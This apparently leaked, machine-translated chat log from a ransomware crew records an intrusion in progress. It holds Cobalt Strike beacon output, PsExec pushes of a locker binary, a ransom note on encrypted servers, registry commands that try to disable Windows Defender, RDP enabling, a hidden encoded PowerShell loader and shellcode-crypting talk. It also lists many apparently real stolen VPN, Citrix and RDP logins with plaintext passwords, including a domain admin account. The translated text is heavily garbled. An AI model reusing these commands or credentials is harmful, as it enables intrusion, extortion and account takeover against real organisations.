Can you tell me please - if the 443 port is closed, the session will not come to the coba? ``` + question to all above we have two people in the team) not we have https domains and the port is 443 so it's more a question of what to do with it if the port is closed)what? @all you a questionPlease tell me - if the 443 port is closed, the session will not come to the cob? https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009 https://lab.devry.edu/vpn/index.html d40016842 Jackson3 https://lab.devry.edu/vpn/index.html d01677853 Lilly535 https://lab.devry.edu/vpn/index.html d01480444 aDv!9659 ``` @user9 do you have 2 more nets to work with? https://vpn.floridapoly.edu ``` I'm scouring the subsnets in search of dk - check on zerologontak, who's doing what write to the groupsnetsIn ptsh you can shove exeshniki into memory like in kob? I still have problems with dedik - no++? everyone has work * yesHey all come on:space_invader:with such files will kapec long lol172.17.0.13 172.17.0.8 ``` The network path was not found. ``` ``` Lost = 4 (100% loss), The remote-exec psexec is the only way to get the files to be encrypted, but it will take a long time to get them to the network, so make sure the locker process is not dead. beacon> remote-exec psexec 10.10.20.131 C:\starter.exe [*] Tasked beacon to run 'C:\starter.exe' on 10.10.20.131 via Service Control Manager [+] host called home, sent: 2005 bytes [-] Could not start service c122355 on 10.10.20.131: 5 ` ` + on 1 i.e. one zamaplenom? the last half an hour, I only worked on one [ ](https://mediaeveryone.com/group/itc-us-com?msg=9oMDn23BwxRksJAqJ) and you can go on the servers are + and all servers) well, now we are waiting for all zamaplenym note appears where the file R3ADM3.txt on the servers? so it's all quiet on the mapped ones+norm the rest? 
10/21/2020 10:01 PM 717 R3ADM3.txt ``13 just seems like you have more than 10 may not go try to run the build if all are plugged in other disks are not mapped anywhere other than C? mine too +[ ](https://mediaeveryone.com/group/itc-us-com?msg=hPjLWs4GnypjiiRGo) `` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK N: \172.17.0.13\C$ Microsoft Windows Network OK O: \10.10.0.129\C$ Microsoft Windows Network OK P: \10.0.10.143$ Microsoft Windows Network OK Q: \10.0.10.83\C$ Microsoft Windows Network OK R: \10.0.10.163\C$ Microsoft Windows Network OK S: \10.0.10.129\C$ Microsoft Windows Network OK T: \\172.17.0.8.8\C$ Microsoft Windows Network OK U: \10.10.20.126$ Microsoft Windows Network OK V: \10.0.10.111\C$ Microsoft Windows Network OK W: \10.10.20.131\C$ Microsoft Windows Network OK X: \10.10.0.135\C$ Microsoft Windows Network OK Y: \10.10.0.117$ Microsoft Windows Network OK Z: \10.0.10.116\C$ Microsoft Windows Network The command completed successfully. 
`````` 10.0.10.116 10.10.0.117 10.10.0.135 10.10.20.131 10.0.10.111 10.10.20.126 10.0.10.126 172.17.0.8 10.0.10.129 10.0.10.163 10.0.10.93 10.0.10.83 10.10.0.103 10.0.20.100 10.0.10.143 10.10.0.129 10.0.10.9 172.17.0.13 And that's 10k you can just add them to the current 5 servers 10.0.0.25 10.0.20.222 10.10.0.118 10.0.10.131 10.0.0.24 10.0.10.103 10.0.10.96 10.0.10.101 10.0.10.134 10.10.0.131 10.0.10.133 10.0.10.35 10.0.20.231 10.0.20.83 10.10.0.134 10.0.10.168 how many is it?[ ](https://mediaeveryone.com/group/itc-us-com?msg=BFy8ZYMKrwdTcqrGF) we put everything on the system32 starters even no unleash on the 5 remaining servers, then nail the dkis then run the classic dpi on all nk through psecs no more than 10 active connections as i remember take some part of it on no unleash in this server10.0.0.7 it in kobe karsnyone not touched + on servers *here, get it? 4 leave it at the end of the dk + 1 servera normal on the servers seemed to go ``` Size Type Last Modified Name ---- ---- ------------- ---- dir 10/13/2020 11:03:20 $Recycle.Bin dir 10/21/2020 21:30:41 Config.Msi dir 10/21/2020 21:30:40 Deskinfo dir 07/14/2009 01:06:44 Documents and Settings dir 10/21/2020 21:30:41 ECI dir 10/21/2020 21:30:41 Godlan dir 10/21/2020 21:30:40 inetpub dir 10/21/2020 21:30:41 MultiLink dir 10/21/2020 21:30:40 PerfLogs dir 10/21/2020 21:30:41 Program Files dir 10/21/2020 21:30:41 Program Files (x86) dir 10/21/2020 21:30:41 ProgramData dir 10/21/2020 21:30:40 Projects dir 10/21/2020 21:30:45 RDL dir 10/21/2020 21:30:40 Recovery dir 10/21/2020 21:30:40 SmartSystems dir 10/21/2020 21:30:40 SQL_Docs dir 07/11/2014 13:15:08 SSTemp dir 09/03/2018 21:01:40 System Volume Information dir 10/21/2020 21:30:45 Users dir 10/16/2020 13:56:57 Windows 1kb fil 10/21/2020 21:30:40 .rnd.GQQNX 13kb fil 10/21/2020 21:30:40 Datacollectors.db.GQQNX 1mb fil 10/21/2020 21:30:41 Infor803ERPInstall.log.GQQNX 0b fil 11/27/2018 22:17:27 Inventory.db 1kb fil 10/21/2020 21:30:41 MAPICSCDInstall.log.GQQNX 680b 
fil 10/21/2020 21:30:40 mode.txt.GQQNX 21gb fil 10/16/2020 18:20:56 pagefile.sys 717b fil 10/21/2020 21:30:40 R3ADM3.txt 185kb fil 10/21/2020 21:30:27 starter.exe 4kb fil 10/21/2020 21:30:40 VSM000.IDX.GQQNX ``then do the rest of the servers do not run for some reason too? 20 servers alive 18 of them 4 - dkv kobe all dragged how many servers and all? such instances occur and the solution is actually above)ah, well, it makes sense)and all his disk to mask the server where there is no such a thing `` C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f ERROR: Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f ERROR: Access is denied. C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f ERROR: Access is denied or can we leave them alone? ok, on one server there are branches protected, so if there is a VL then it will not work anywhere under the DA token does not even need to mount anything) specify a list of waysflag through -p akfuberem simply from servers under the DA token why run on farms? on servers if started - this is enough and there check on a sample basis take another 3 farms` `` PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com [+] received output: The system cannot find the file specified. Connecting to 10.0.20.222... Starting PSEXESVC service on 10.0.20.222... Connecting with PsExec service on 10.0.20.222... Starting C:\starter.exe on 10.0.20.222... 
PsExec could not start C:\starter.exe on 10.0.20.222..: `````` beacon> portscan 10.0.20.222 3389 none [*] Tasked beacon to scan ports 3389 on 10.0.20.222 [+] host called home, sent: 93245 bytes [+] received output: Scanner module is complete ``I think the rdp should turn on...`` [*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 [*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 [*] Tasked beacon to run: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f [+] host called home, sent: 472 bytes [+] received output: The operation completed successfully. ``doesn't give a token;`` * Username : egl_admin * Domain : ITC * Password : E@gle@x1s3030 ´´just won´t connect to the pc without an account, we left the old one at egl_admin we changed the prółi Yes you are under whom7 not connect[ ](https://mediaeveryone.com/group/itc-us-com?msg=eLf3auQNBPDqNABtu) did not work? if it does not work wl on armas@user9 and try to run the exe from the root try to run it from the root, try also under yes I am not allowed to come here ´´´ beacon> shell c:\explorer.exe [*] Tasked beacon to run: c:\explorer.exe [+] host called home, sent: 46 bytes [+] received output: Access is denied. ``I'm wondering what's up with that, too maybe whitelisting the appliques? shell starter.exe [*] Tasked beacon to run: starter.exe [+] host called home, sent: 42 bytes [+] received output: Access is denied. ``` this is from the roottry it from the root some bullshit beacon> shell WINDOWSSystem32.exe [*] Tasked beacon to run: WINDOWSSystem32.exe [+] host called home, sent: 50 bytes [+] received output: Access is denied. 
beacon> pwd [*] Tasked beacon to print working directory [+] host called home, sent: 8 bytes [*] Current directory is C:\ beacon> whoami [-] Unknown command: whoami beacon> shell whoami [*] Tasked beacon to run: whoami [+] host called home, sent: 37 bytes [+] received output: nt authority\system ``root C'' test pleasefolder in the ps sheet is not lit any aBtry the root of the drive also writes access deenedtry another folderoffinloskarr and does not delete but blocks the startup on the servers we winndef by the batnoy chopped by the way `` beacon> shell dir 1.exe [*] Tasked beacon to run: dir 1.exe [+] host called home, sent: 40 bytes [+] received output: Volume in drive C is OS Volume Serial Number is D85B-9A4C Directory of C:\WINDOWS\System32 10/21/2020 09:02 PM 189,440 1.exe 1 File(s) 189,440 bytes 0 Dir(s) 190,692,196,352 bytes free `````` beacon> shell 1.exe [*] Tasked beacon to run: 1.exe [+] host called home, sent: 36 bytes [+] received output: Access is denied. ``Let's cut it up.....webroute if vindef is off then logicales the usual jump logged in as domain admin on dcvode by the way vindef is offvote so with rdp will go well``` For /f "tokens=*" %%a in (c:\tmp\ComputerList.txt) Do psexec \\\%%a -i gpupdate either I didn't give him /force enough, the point is that either psec gave him all the parameters after the program name I can kind of see he's got a process with a direct pointer to run under a token, I tried different things, why shouldn't I run it under a token? shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 ``` that worked, isn't it gpupdate's own parameters? gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 ``I think there's something wrong with it``. 
gpupdate.exe 12492 Services 0 4,424 K NT AUTHORITY\SYSTEM 0:00:00 `````` beacon> shell PsExec \10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 [*] Tasked beacon to run: PsExec \10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 [+] host called home, sent: 131 bytes [+] received output: PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com [+] received output: Connecting to 10.0.20.222... Starting PSEXESVC service on 10.0.20.222... Connecting with PsExec service on 10.0.20.222... Starting gpupdate on 10.0.20.222... gpupdate started on 10.0.20.222 with process ID 46196. ``blocks startup10.0.20.222 give ip arm+aver webroot and only?but still does not givebatnik worked on shutdown vindefa tried on a couple of armas startup starter - do not givelokaet servers, workstations can be daunts - there are almost never any processes that hold important files + the batcher worked to shutdown windup on the servers and then dkpot everything else on the servers because no firewall rules on remote managment on the client machines have been turned on all the machines ishell PsExec \\* -d -s - error there why psexec?why don't you update it with dk gpo? beacon> shell PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 [*] Tasked beacon to run: PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030 [+] host called home, sent: 121 bytes [+] received output: PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Enumerating domain... 
A system error has occurred: 2184 ``cobalt crashes which is yellow you can not enter into the interface with ITC-DC-SVR01[ ](https://mediaeveryone.com/group/itc-us-com?msg=qX3zp9exDqEMwuc5q) here it is my t,exfz stinking give more access to the coboo where to do[ ](https://mediaeveryone.com/group/itc-us-com?msg=2fCSwKCMjzbrqCNBG) daschae to reboot or I can give more vpns can now see what you need (the second was not (patient in the note is mentioned as an identifier in the name of the "code" bildan, the file name in the archive if so, here is ``SDIJ*FHg78SDFGTI&SDtARTE%YET`` do you mean the archive password? ``` uIYeJR0AY0hM9wCq0pK0S0fSgUFvquxwDi1Ieh3X093RPVdLcow9OB4lOmLDzISp ``boys, do not remember what was the build code of the locker? If you do not see it, it does not see in 99 percent of cases, if it gives the result - then the machine sees the DC. Username: SBolley. Password: thisduckingsucks!02 `Working on what is the jam? LA no. Looking for where the current polzak admin in the subnets from the sysbetstsuspasiblE I have nothing, try the other loads and work through ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` in `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - error when logging into citrix `mch1.org` - no access at all anywhere except medical app, where login and password cannot be entered `protransport.cloud.com` - only have access to the freight application, the login details do not fit ``unf.edu `` - now in operation, removed adinfo, DA, DK, kerbs transferred tl2, removed the ball list, now network walkthrough and removal of mimic+hashdampanet gives you a hookup from the ip dedic ``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx ``` Citrix doesn't lead anywhere except for admin sites, there is a VPN tunnel on the gateway but no one can see any computers on the net ``` 
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml ``` in work - about the progress wrote in the confr not much progress in words, not enough PCs at the moment it is /16 on 445 ``` https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com I can't get anything to work, closed by the admin cmd admins please write about which domain it's about and what's wrong or so i don't understand how i can try eleveit kite via that tool, tomorrow i will try to do it via deadic https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 What was wrong with the first one? @user3 I have 2 accesses written down on youI have nothing, I'll try the other loads and work through pswhat went wrong or did it work and what progressSISDNET - continue to `scan subnets from sabnets - looking for where the admin polzak ` straight on all their current accesses that bralitak well I would still first remove the hell, kerb, sharpfinder. the current tour allows if the AV is not too biting8443 port still wanted to write about it) rev_tcp_rc4 very good from msfCheck different ports rev_http rev_https 80/443/53I would have played with listener and portsada i think here check in kobu and in armagate 2 loads and you can understand that not pull)not once rolled sessions in armagate info unloadnado had to work under current conditions, remove kerb etc if not allowed a clean dll then it blocks the traffic is not there in loadsTried to run different loads. did not work till 11 work, at 11, the total for 10 minutes and go home at 11, wrap it upwrite in groups that done pishite in conffor where the problem[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) in general with my session is sad i run a tool - it works and session flies away on others not i ran - says that on the machine where i have access to admin spheres but he does not have rights why did you run toshairfinder? check if polzak has admin rights to other machines ? 
i have no progress with mgrmedu.com polzak can't get it up. I'm surfing the net. + sessions keep dropping - avrubit checked with scanner ms17 the only alive server 2008 - dead took the kerbs off the trusts and gave them to tl2 i'm thinking what to raise i'm trying to get the system what results do you have? it's dirtier than the ground)yeahlfcobes? load what? i'm running `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!` in cmd/ps load ``powershell -nop -w hidden -encodedcommand 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 ``The process is created, but the session does not come amsi bypass script blocks as malwarekak malware script[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) I tried it, it blocks avi still, I repeat I don't know how many times, remove your tules and any of your files from the system, remove the kerberostom if rubeus blockutpoyadalashev further it depends on you how you will raise them) you have the whole githab) ability to work with cmd, download files and so on, but how to raise privileges through this tool?if there's no file, there's no kerbs either, right? when you remove the kerbs, send it to @tl2 and duplicate it in the conf@user7 in the conf@user9 conf, please@user9 made the conf thank you@user4 duplicate it in the conf[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.com me, I threw tl2 can chat, you can pour rubyuskstatino no one else? no one else took kerbs? take one just for yourself you have 4 dedicates` `` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76! ``This one here requires an old sitrickets weight, I download it and when I install it it says to me like: It's not really a new version? Put the newest. If I tear down the new one that is standing the guys can not use the shellcode in the privateIn @tl1 there is a shellcode builder so it starts like this ``. 
rundll32.exe C:\path\to\file\file.dll,entryPoint regsvr32.exe /s C:\path\to\file\file.dll ``this is the FUD``. ./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep `````` Doing a cryptor raw to exe session does not come. ``` It opened...I had a message that the site does not support tls 2.0 or change the default gateway to another one just to check if it is available. Reset it completelyfresh? What browser do you use? Does it show the page? It's ok. The session is not coming from the default gateway. https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx is just a white screen, so no valid CREDES? https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! ``There's no connection here? phoen1xasp.com `````` https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 ``Don't run cmd, powerShell, taskmgr everything is mocked up admin then you are the quietest in the job and why do you need a replacement writeLf you need anything else? https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234 ``` @user9 replacementdavaynetwebuy I can give you more access, it may work faster there than here ``` beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024 [*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. [read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.168' is alive. 
[read 8 bytes] (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. [read 8 bytes] [+] received output: 172.0.0.188:443 172.0.0.187:443 [+] received output: Scanner module is complete ``Check Web Ports'' somewhere in the vicinity beacon> portscan 172.0.0.1/24 445 icmp 1024 [*] Tasked beacon to scan ports 445 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. [read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] (ICMP) Target '172.0.0.168' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. [read 8 bytes] [+] received output: Scanner module is complete ```:ok_hand:at 24 scan for DNS sabnetupo put scan /16 of your ip is on the interface check ipconfigda alive it seems to have fallen offavpn alive? and ping does not pass to the ip that ip scanner gave[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) does not work to move anywhere napn streaked but in the subnet 172.169.16.1-172.169.17.254 portskan does not give anything took the firewall in their hands and blocked, okzablochal rdp connect why is it? kaspersky nailed itawn your addicts second so he probably and blocked the entrance[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) yes, citkrix will not let without edr and windef was a palsy to include) created[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) there's a session did you have kasper on the hard disk? 
OK, I'll rewrite it[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) no, it was a text file. os, what did you do, what you got, what was expected, what's the problem and now I took off the toolchain before I got thrown out - I took off by hand - if the hands - is it an archive? so I do not understand, you took it off by hand or through toolchain? i did not finish downloading - more than 200 meters file was `` `` https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207! ``` @user8 replacement from tulchain adf returned 11 users and how many without tulchain? maybe it's okay? or maybe it's a bug? from tulchain - it returned 11 users in adfind, and I downloaded the file 238 MB there is nothing at all?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) there is only one application and these creed him not catalyze more, take hell, take the access and get into the network who does that) creed citr....and the record of persist from the registry disappearednu I put on my coba persist where did you get dll to fix? ummy everything disappeared, even dll to fix there is nothing there av or something? strange in the appdata from the usera where you left them? there is strange.... i just re-logged through cirta, re-session to myself, and no my files there already ... how so? burned by the demons? ah, good come back i already.then he had already hell info take away someone @user4 in the net so well, you now have 3 dedicates and wpn not turn off even after reboot most likely flew a dedicate for wpn means from a portal with flash config) well go to the link he invited himself to download from the portal?installed from where? there only citra installed and all, not even configured it put vpn? i and user 9 on it worked ddik not connect to what is it? who last worked at 199.241.188.186? https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com blue4586 ``` @user8 replaced ad infosisd@user4 from where? 
@user8 beep me in the confu I had a session failed (progress described in the confu@user9 @user7 in work what other 3 people are busy? and you're an admin? ok, now add a user group burned anomaly and removed the remote access group `the connection was denied because the user account is not authorized for remote login `` what do you mean not authorized for remote login ?who has the ipn up / have access to the network ? did not understand the question who else ? @user9 at worklsadmiki some sites.i have one, from citrix can not go anywhere iphone is up and running on a new computer - i'll try to see what's on the net under ipnomtoolchain for tests1 how many networks are up and running? FH*(UG&$*WFHWH&*efu ``What to do next? What's the plan? You mean the citrix receiver? I also kinda connected, but then the ddik went away@user9 and what's your problem? I connected to vpnuwin 2012`` 206.221.176.24:37345 Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY hotswapdate.com not yet available in the daedic is it still not fixed? the same situation I can not run cmd and powerShell is closed by the admin, the file does not fill up.what's your confab? then the lpe and so on)) if you forget: AD INFO, LA, DA, EA, DCnet, all according to the algorithm i enter the system, then as usual? or some other inputs? i do not understand the question, we work out the whole grid, i mean AD to shoot? and while the daemon is not available i still logged in, i just a little do not understand everything there, in this link, leads to the sites[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) are you logged in? or a user? https://connect.mch1.org/vpn/index.html lpsmpep2 vk2lazu4 ``` @user8 replacementdescribe in confutacci@user8 where are we? ok, he'll reboot and bring him to the cobb just in case he went for a vpn taqi so weno after start I worked in it 10 minutes moreplugin citrixa haven't you run a vpn on it by chance?) 
yes, a few minutes he will work and then 15 is not availablepohodu dead dead (199.241.188.186) ``` https://mydesktop.sisd.net/vpn/index.html jeksae happiness3 ``` @user4 change the citrix receiver something like a pass-through but it's not going online? [ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) the dedicator is falling off, but I've been there - everything leads to the admin sites JE*SG&Y*FwEYHIf7g8we JE*SG&YY*wEYFEYffggWe ##+Dadokin ## but there's a detection rate higher there's a variant of crypta shellcode in the shellcode in the dllnea? https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com thebear#1 ``` @user9 replacement@user3 replacement ``` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! Pass the dedik @user8 in the meantime, the user is logged in and then the user disappears from the list. your changes could not be served due to an invalid configuration of the account PROD ica file is a file that citrix receiver opens and you have to put citrix receiver which will open this file. [Encoding] InputEncoding=UTF8 [WFClient]. ProxyFavorIEConnectionSetting=Yes ProxyTimeout=30000 ProxyType=Auto ProxyUseFQDN=Off RemoveICAFile=yes TransparentKeyPassthrough=Local TransportReconnectEnabled=Off Version=2 VirtualCOMPortEmulation=On [ApplicationServers] Report Request Maintenance Prod= [Report Request Maintenance Prod] Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6 AutologonAllowed=ON BrowserProtocol=HTTPonTCP CGPSecurityTicket=On ClearPassword=53F80104235331 ClientAudio=On DesiredColor=8 DesiredHRES=0 DesiredVRES=0 Domain=\6AA387C7B8517C82 DoNotUseDefaultCSL=On EncryptionLevelSession=EncRC5-128 FontSmoothingType=0 HDXoverUDP=Off HTTPBrowserAddress=! InitialProgram=#Report Request Maintenance Prod Launcher=WI LaunchReference=558DD381B14D807B6BEEDE6BACFB10 LocHttpBrowserAddress=! 
LogonTicket=53F801042353316AA387C7B8517C82 LogonTicketType=CTXS1 LongCommandLine= LPWD=156 NRWD=93 ProxyTimeout=30000 ProxyType=Auto SecureChannelProtocol=Detect SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb SFRAllowed=Off SSLCiphers=all SSLEnable=On SSLProxyHost=ag2.cernerworks.com:443 startSCD=1606819909507 Title=Report Request Maintenance Prod TransportDriver=TCP/IP TRWD=0 TWIMode=On WinStationDriver=ICA 3.0 [Compress]. DriverNameWin16=pdcompw.dll DriverNameWin32=pdcompn.dll [EncRC5-0]. DriverNameWin16=pdc0w.dll DriverNameWin32=pdc0n.dll [EncRC5-128]. DriverNameWin16=pdc128w.dll DriverNameWin32=pdc128n.dll [EncRC5-40]. DriverNameWin16=pdc40w.dll DriverNameWin32=pdc40n.dll [EncRC5-56]. DriverNameWin16=pdc56w.dll DriverNameWin32=pdc56n.dll ``All kerbs to @tl2a, all)``or does medimizer refer to user4? https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ``Yes, I then changed the message to medimizerthere were just 2 accounts@user9 you took access from @user4 he has the domain ``mysystems4pt.com```https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!``[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ``Zabrad https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773`` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Create a confab, add you sort and write who took what accesses are valid 5 pieces``. 
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 `````` https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87 ``And there will also be rdp`` https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline `````` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent `````` https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E! ``Don't you remember how it's done?'') dismantle and get to work you have 2 ddisks to work with vpn + citras from the scale of work, I give you a list of citras + vpn + citras, while will be in stockDo not, just no one needs it, all gone, someone wants another new koba? spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf If the koba does not connect to the koba then it is inaktiv right?i have 2 inactive3 koba means workingkhaip domain with parentheses in googledav query as you wrote, with parentheses23.106.160.86 no information no domain atypip domain or ip koba checked?i have two clean cb's if there is info that ip marked as cb's then cb's in the snow search 123[.]123[.123[ ]123zasvilischestvennym as koba strike at whom koba active check the domain ip in google on detektovydam fresh yescryptor there? activesimvp.com somebody one did not sign off on koba) the rest did not have a koba? likenic.com 104.243.40.126:38542 ``` not active me ``85.150.190.113:61718`` active (it's from the last one they gave)`` the others? 
``` https://ezvol.com - 209.222.101.55:38350 Sessions from labs arrivetulkit will be closer to 15:00 fresh build, it will be given out @tl2, sootv from all of us feedback on the workrallss.com active/not activeskat me your old kobytes what about the tool kit and on kobami, in terms of work in the old or new will be?min 10 for org questions and then work directly Well hello again everyone, it's been a long time we did not communicate with you now 5) 5) total 4? all in place and start)Good day:space_invader:hello\Good day to you all Windows IP Configuration Host Name . . . . . . .: UKHECSLT3028 Primary Dns Suffix . . . . ♪ matches.com ♪ Node Type ... ... . ♪ Hybrid ♪ IP Routing Enabled . . . . No. WINS Proxy Enabled. .: No DNS Suffix Search List. . matches.com Home Ethernet adapter Ethernet: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . . . ♪ Intel(R) Ethernet Connection (6) I219-V ♪ Intel(R) Ethernet Connection (6) I219-V Physical Address . . . . .: E8-D8-D1-F3-F7-7E DHCP Enabled . . . . .: Yes Autoconfiguration Enabled . .: Yes Wireless LAN adapter Local Area Connection* 1: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter ♪ Physical Address . . . . : 60-F2-62-90-AE-62 DHCP Enabled. . . . . .: Yes Autoconfiguration Enabled. .: Yes Wireless LAN adapter Local Area Connection* 2: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter #2 ♪ Physical Address . . . . .: 62-F2-62-90-AE-61 DHCP Enabled. . . . .: Yes Autoconfiguration Enabled. .: Yes Ethernet adapter Ethernet 2: Media state ... ... ... ♪ Media disconnected ♪ Connection-specific DNS Suffix : Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6.30) . Physical Address . . . . .: 00-09-0F-FE-00-01 DHCP Enabled . . . . Yes Autoconfiguration Enabled . 
